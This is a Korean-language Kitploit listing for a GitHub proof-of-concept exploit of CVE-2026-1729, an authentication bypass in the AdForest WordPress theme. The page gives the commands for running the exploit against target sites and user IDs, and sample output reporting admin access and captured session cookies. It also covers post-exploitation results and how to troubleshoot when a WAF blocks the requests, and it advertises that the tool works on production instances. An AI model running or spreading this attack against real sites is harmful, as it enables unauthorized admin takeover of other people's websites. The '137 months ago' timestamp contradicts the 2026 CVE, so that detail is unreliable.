Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

AdForest WordPress 테마는 6.0.12를 포함한 모든 버전에서 인증 우회 취약점에 노출되어 있습니다. 이는 플러그인이 'sb_login_user_with_otp_fun' 함수를 통해 사용자를 인증하기 전에 사용자의 신원을 제대로 확인하지 않기 때문입니다. 이로 인해 인증되지 않은 공격자가 관리자를 포함하여 로그인할 수 있게 됩니다.

저장소 보기
137개월 전아직 검토되지 않음

CVE-2026-1729 - AdForest WordPress 인증 우회 PoC

설명

CVE-2026-1729에 대한 간단한 개념 증명(PoC) - AdForest WordPress 테마의 인증 우회 취약점. 작성자: f3ds cr3w est 2oo2 blog

기능

  • ✅ 자격 증명 없이 관리자 직접 접근
  • ✅ 프로덕션 WordPress 인스턴스에서 작동
  • ✅ Docker 설정 불필요
  • ✅ 간단한 명령줄 인터페이스
  • ✅ 세션 유지

요구 사항

  • Python 3.6+
  • requests 라이브러리

설치

pip install requests

사용법

기본 사용법

python poc/exploit.py https://target-site.com

특정 사용자 ID 대상 지정

python poc/exploit.py https://target-site.com --user-id 2

예시

# Exploit default admin (user ID 1)
python poc/exploit.py https://example.com

# Exploit specific user account
python poc/exploit.py https://example.com --user-id 5

# Test multiple targets
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

출력

CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

악용 후 결과

  1. 관리자 접근: /wp-admin/에 대한 전체 관리자 접근 권한을 얻습니다.
  2. 세션 유지: 익스플로잇이 세션 쿠키를 유지합니다.
  3. 사용자 정보: 손상된 계정을 표시합니다.
  4. 직접 접근: WordPress 관리자 대시보드에 즉시 접근할 수 있습니다.

참고 사항

  • 법적 사용: 소유한 사이트 또는 명시적 테스트 허가를 받은 사이트에서만 사용하세요.
  • 대상 요구 사항: 사이트에 AdForest 테마가 설치되어 있어야 합니다.
  • 성공률: 취약한 버전의 AdForest 테마에서 작동합니다.
  • 설치 불필요: 대상 서버에 아무것도 설치할 필요가 없습니다.

문제 해결

익스플로잇이 실패하는 경우:

  1. AdForest 테마가 설치되어 있는지 확인하세요.
  2. 사이트가 WordPress를 실행 중인지 확인하세요.
  3. 테마 버전이 취약한지 확인하세요.
  4. WAF 또는 보안 플러그인이 요청을 차단하고 있지 않은지 확인하세요.
도구 다운로드